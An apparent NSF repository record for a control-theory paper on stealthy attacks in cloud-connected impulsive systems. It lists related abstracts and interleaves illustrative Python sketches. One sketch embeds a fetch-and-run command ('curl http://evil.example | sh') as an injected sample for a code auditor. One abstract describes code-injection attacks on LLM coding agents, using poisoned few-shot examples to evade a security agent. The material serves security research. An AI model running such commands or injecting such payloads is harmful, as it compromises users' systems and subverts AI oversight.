
Title: Stealthy Attacks in Cloud-Connected Linear Impulsive Systems
This paper studies a security problem for a class of cloud-connected multi-agent systems, where autonomous agents coordinate via a combination of short-range ad-hoc communication links and long-range cloud services. We consider a simplified model for the dynamics of a cloud-connected multi-agent system and the attacks against it, where the states evolve according to linear time-invariant impulsive dynamics, and attacks are modeled as exogenous inputs, designed by an omniscient attacker, that alter the continuous and impulsive updates. We propose a definition of attack detectability, characterize the existence of stealthy attacks as a function of the system parameters and attack properties, and design a family of undetectable attacks. We illustrate our results on a cloud-based surveillance example.
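
As a rough illustration of the system class in the abstract, the sketch below simulates linear time-invariant impulsive dynamics with an exogenous attack input acting on both the continuous flow and the impulsive (cloud) update. All matrices, the impulse schedule, and the attack signals are illustrative assumptions, not the paper's actual model.

```python
import numpy as np

# Assumed model: between impulses the state flows as x' = A x + B u_a
# (continuous attack u_a); at cloud-update instants it jumps as
# x+ = E x + F v_a (impulsive attack v_a). All values are assumptions.
A = np.array([[0.0, 1.0], [-1.0, -0.5]])   # continuous dynamics
B = np.array([0.0, 1.0])                   # continuous attack channel
E = np.array([[1.0, 0.0], [0.2, 0.8]])     # impulsive (cloud) update
F = np.array([0.5, 0.0])                   # impulsive attack channel

dt, T, period = 0.01, 10.0, 1.0
x = np.array([1.0, 0.0])
next_jump = period

for step in range(int(T / dt)):
    t = step * dt
    u_a = 0.1 * np.sin(2 * np.pi * t)      # assumed continuous attack
    x = x + dt * (A @ x + B * u_a)         # forward-Euler flow step
    if t >= next_jump:                     # impulsive (cloud) update
        v_a = 0.05                         # assumed impulsive attack
        x = E @ x + F * v_a
        next_jump += period

print("final state under attack:", x)
```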
Award ID(s):
1710621
PAR ID:
10094186
Author(s) / Creator(s):
Date Published:
Journal Name:
American Control Conference
Page Range / eLocation ID:
146 to 152
Format(s):
Medium: X
Sponsoring Org:
National Science Foundation
More Like this
  1. In offline multi-agent reinforcement learning (MARL), agents estimate policies from a given dataset. We study reward-poisoning attacks in this setting, where an exogenous attacker modifies the rewards in the dataset before the agents see it. The attacker wants to guide each agent into a nefarious target policy while minimizing the Lp norm of the reward modification. Unlike attacks on single-agent RL, we show that the attacker can install the target policy as a Markov Perfect Dominant Strategy Equilibrium (MPDSE), which rational agents are guaranteed to follow. This attack can be significantly cheaper than separate single-agent attacks. We show that the attack works on various MARL agents, including uncertainty-aware learners, and we exhibit linear programs that solve the attack problem efficiently. We also study the relationship between the structure of the datasets and the minimal attack cost. Our work paves the way for studying defense in offline MARL.
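
The abstract above mentions linear programs that compute a minimal-cost reward poisoning. The sketch below sets up one such LP for an assumed toy instance (one state, two players, two actions each): it installs action 0 as a strictly dominant strategy for both players while minimizing the L1 norm of the reward modification. The game, the dominance margin, and the encoding are illustrative, not the paper's exact formulation.

```python
import numpy as np
from scipy.optimize import linprog

R1 = np.array([[0.0, 0.0], [1.0, 1.0]])  # player 1 rewards R1[a1, a2]
R2 = np.array([[0.0, 1.0], [0.0, 1.0]])  # player 2 rewards R2[a1, a2]
iota = 0.1                               # assumed dominance margin

# Variables: 8 reward deltas (d), then 8 absolute-value slacks (t).
n = 8
c = np.concatenate([np.zeros(n), np.ones(n)])  # minimize sum of t

A_ub, b_ub = [], []
for i in range(n):          # t_i >= |d_i|  via  +-d_i - t_i <= 0
    for s in (1.0, -1.0):
        row = np.zeros(2 * n)
        row[i], row[n + i] = s, -1.0
        A_ub.append(row); b_ub.append(0.0)

# d layout: d1[0,0], d1[0,1], d1[1,0], d1[1,1], then d2 likewise.
idx1 = lambda a1, a2: 2 * a1 + a2
idx2 = lambda a1, a2: 4 + 2 * a1 + a2

for a2 in range(2):  # player 1: action 0 beats action 1 for every a2
    row = np.zeros(2 * n)
    row[idx1(0, a2)], row[idx1(1, a2)] = -1.0, 1.0
    A_ub.append(row); b_ub.append(R1[0, a2] - R1[1, a2] - iota)
for a1 in range(2):  # player 2: action 0 beats action 1 for every a1
    row = np.zeros(2 * n)
    row[idx2(a1, 0)], row[idx2(a1, 1)] = -1.0, 1.0
    A_ub.append(row); b_ub.append(R2[a1, 0] - R2[a1, 1] - iota)

res = linprog(c, A_ub=np.array(A_ub), b_ub=np.array(b_ub),
              bounds=[(None, None)] * n + [(0, None)] * n)
print("minimal L1 poisoning cost:", res.fun)
```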
  2. In this paper, we study a security problem for attack detection in a class of cyber-physical systems consisting of discrete computerized components interacting with continuous agents. We consider an attacker that may inject recurring signals into both the physical dynamics of the agents and the discrete interactions. We model these attacks as additive unknown inputs with appropriate input signatures and timing characteristics. Using hybrid systems modeling tools, we design a novel hybrid attack monitor and, under reasonable assumptions, show that it is able to detect the considered class of recurrent attacks. Finally, we illustrate the general hybrid attack monitor using a specific finite time convergent observer and show its effectiveness on a simplified model of a cloud-connected network of autonomous vehicles.
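
As a rough stand-in for the attack-monitor idea above, the sketch below runs a model-based observer alongside the plant and flags an attack when the output residual crosses a threshold. It uses a plain discrete-time Luenberger observer rather than the paper's finite time convergent observer, and every number is an illustrative assumption.

```python
import numpy as np

A = np.array([[1.0, 0.1], [0.0, 1.0]])  # assumed plant dynamics
C = np.array([1.0, 0.0])                # measure the first state
L = np.array([0.5, 0.3])                # observer gain (assumed stabilizing)
threshold = 0.05

x = np.array([1.0, 0.0])                # true state
xh = x.copy()                           # observer starts synchronized

for k in range(100):
    attack = 0.3 if 40 <= k < 60 else 0.0  # recurring additive attack
    x = A @ x + np.array([0.0, attack])    # attacked plant step
    xh = A @ xh                            # observer prediction
    r = C @ x - C @ xh                     # scalar output residual
    xh = xh + L * r                        # measurement correction
    if abs(r) > threshold:
        print(f"k={k}: residual {r:+.3f} -> attack flagged")
```

Absent an attack, the residual stays at zero here; the injected signal drives it past the threshold within a couple of steps.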
  3. Agentic AI and Multi-Agent Systems are poised to dominate industry and society imminently. Powered by goal-driven autonomy, they represent a powerful form of generative AI, marking a transition from reactive content generation into proactive multitasking capabilities. As an exemplar, we propose an architecture of a multi-agent system for the implementation phase of the software engineering process. We also present a comprehensive threat model for the proposed system. We demonstrate that while such systems can generate code quite accurately, they are vulnerable to attacks, including code injection. Due to their autonomous design and lack of humans in the loop, these systems cannot identify and respond to attacks by themselves. This paper analyzes the vulnerability of multi-agent systems and concludes that the coder-reviewer-tester architecture is more resilient than both the coder and coder-tester architectures, but is less efficient at writing code. We find that by adding a security analysis agent, we mitigate the loss in efficiency while achieving even better resiliency. We conclude by demonstrating that the security analysis agent is vulnerable to advanced code injection attacks, showing that embedding poisonous few-shot examples in the injected code can increase the attack success rate from 0% to 71.95%.
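
The agents in the paper above are LLM-based, but the core idea of auditing generated code before accepting it can be sketched with a simple static check. The AST-based scanner and its flagged-call list below are illustrative assumptions standing in for the security analysis agent, not the system in the paper.

```python
import ast

# Assumed set of call names a naive auditor would flag.
FLAGGED = {"eval", "exec", "system", "popen", "__import__"}

def audit(source: str) -> list[str]:
    """Return a list of suspicious calls found in the source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            fn = node.func
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", "")
            if name in FLAGGED:
                findings.append(f"line {node.lineno}: call to {name!r}")
    return findings

# 'Generated' code carrying an injected payload alongside the real task.
generated = (
    "def add(a, b):\n"
    "    return a + b\n"
    "import os\n"
    "os.system('curl http://evil.example | sh')\n"  # injected payload
)
print(audit(generated))  # -> ["line 4: call to 'system'"]
```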
  4.
    Robustness of Deep Reinforcement Learning (DRL) algorithms to adversarial attacks in real-world applications, such as those deployed in cyber-physical systems (CPS), is of increasing concern. Numerous studies have investigated the mechanisms of attacks on the RL agent's state space. Nonetheless, attacks on the RL agent's action space (corresponding to actuators in engineering systems) are equally perverse, but such attacks are relatively less studied in the ML literature. In this work, we first frame the problem as an optimization problem of minimizing the cumulative reward of an RL agent with decoupled constraints as the attack budget. We propose the white-box Myopic Action Space (MAS) attack algorithm that distributes the attacks across the action space dimensions. Next, we reformulate the optimization problem above with the same objective function, but with a temporally coupled constraint on the attack budget to take into account the approximated dynamics of the agent. This leads to the white-box Look-ahead Action Space (LAS) attack algorithm that distributes the attacks across the action and temporal dimensions. Our results show that, using the same amount of resources, the LAS attack deteriorates the agent's performance significantly more than the MAS attack. This reveals the possibility that, with limited resources, an adversary can exploit the agent's dynamics to craft attacks that cause the agent to fail. Additionally, we leverage these attack strategies as a tool to gain insight into the potential vulnerabilities of DRL agents.
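
A minimal sketch of the myopic action-space idea: at each step the adversary spends a per-step budget (the decoupled constraint) on the action perturbation that most degrades the immediate reward. The scalar dynamics, policy, and reward below are assumed for illustration; the paper's MAS and LAS algorithms operate on learned DRL policies.

```python
import numpy as np

def policy(x):              # assumed stabilizing (imperfect) policy
    return -0.8 * x

def rollout(budget):
    x, total = 1.0, 0.0
    for _ in range(50):
        a = policy(x)
        # Myopic attack: the next reward is -(x + a + d)^2, so within
        # |d| <= budget the worst perturbation pushes the state away
        # from the origin.
        d = budget * np.sign(x + a) if x + a != 0 else budget
        x = x + a + d
        total += -x ** 2
    return total

print("no attack :", rollout(0.0))
print("MAS attack:", rollout(0.2))
```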
  5. The advent of autonomous mobile multi-robot systems has driven innovation in both the industrial and defense sectors. The integration of such systems in safety- and security-critical applications has raised concern over their resilience to attack. In this work, we investigate the security problem of a stealthy adversary masquerading as a properly functioning agent. We show that conventional multi-agent pathfinding solutions are vulnerable to these physical masquerade attacks. Furthermore, we provide a constraint-based formulation of multi-agent pathfinding that yields multi-agent plans that are provably resilient to physical masquerade attacks. This formalization leverages inter-agent observations to facilitate introspective monitoring that guarantees resilience.
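
A minimal sketch of the introspective-monitoring idea from the abstract above: agents compare a neighbor's observed position against its announced plan and flag any mismatch as a possible masquerade. The plans and observations are assumed toy data; the paper's constraint-based formulation is what guarantees such deviations will actually be observed.

```python
# Announced plans: agent -> grid cell occupied at each timestep (assumed).
plans = {
    "r1": [(0, 0), (0, 1), (0, 2)],
    "r2": [(2, 0), (1, 0), (0, 0)],
}

def check(agent, t, observed_pos):
    """Return True if the observation matches the agent's announced plan."""
    expected = plans[agent][t]
    if observed_pos != expected:
        print(f"t={t}: {agent} at {observed_pos}, plan says {expected} "
              "-> possible masquerade attack")
        return False
    return True

check("r2", 1, (1, 0))   # consistent with the announced plan
check("r2", 2, (1, 1))   # deviation -> flagged
```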